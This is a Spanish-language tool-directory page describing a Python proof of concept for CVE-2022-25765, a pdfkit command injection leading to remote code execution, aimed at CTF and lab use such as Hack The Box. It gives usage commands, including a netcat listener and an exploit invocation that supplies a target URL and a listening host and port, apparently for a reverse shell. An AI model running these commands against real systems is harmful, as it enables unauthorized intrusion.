Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-25765 — Prueba de concepto en Python para CVE-2022-25765, una vulnerabilidad de inyección de comandos en pdfkit, que permite la ejecución remota de código mediante la generación de PDF manipulados. | Kitploit
Herramientas/GitHubGitHub/innocentx0/cve-2022-25765
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónComando y ControlAprendizaje y Educación
GitHubinnocentx0/cve-2022-25765

CVE-2022-25765

Prueba de concepto en Python para CVE-2022-25765, una vulnerabilidad de inyección de comandos en pdfkit, que permite la ejecución remota de código mediante la generación de PDF manipulados.

Ver Repositorio
hace 16h 57mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-25765 — pdfkit

PoC para CVE-2022-25765, que afecta a versiones vulnerables de pdfkit.

Probado con pdfkit 0.8.6.

Requisitos

  • Python 3.x
  • requests
  • colorama

Instalar dependencias:

root@kitploit:~
pip3 install -r requirements.txt

O manualmente:

root@kitploit:~
pip3 install requests colorama

Uso

root@kitploit:~
python3 exploit2.py -u <TARGET> -l <LHOST> -p <LPORT>

Ejemplo: Ejecuta un listener

root@kitploit:~
nc -lvnp 4242
root@kitploit:~
python3 exploit2.py -u http://10.10.10.10 -l 10.10.14.5 -p 4444

Configuración

Clona el repositorio:

root@kitploit:~
git clone [email protected]:innocentx0/CVE-2022-25765.git
cd CVE-2022-25765

Instala los requisitos:

root@kitploit:~
pip3 install -r requirements.txt

Ejecuta el PoC contra tu objetivo de laboratorio.

Vulnerabilidad

CVE-2022-25765 es una vulnerabilidad de inyección de comandos en versiones vulnerables de pdfkit.

El problema está relacionado con una sanitización insuficiente de la entrada controlada por el usuario que se pasa al proceso de generación de PDF.

Notas

Este PoC fue creado principalmente para aprendizaje y entornos CTF/laboratorio.

Si buscas un lugar para probarlo, Hack The Box : Máquina: Precious.

Aviso legal

Úsalo solo contra sistemas que poseas o para los que tengas permiso explícito de prueba.

No soy responsable del mal uso o daños causados por este proyecto.


INNOCENTx0

Descargar herramienta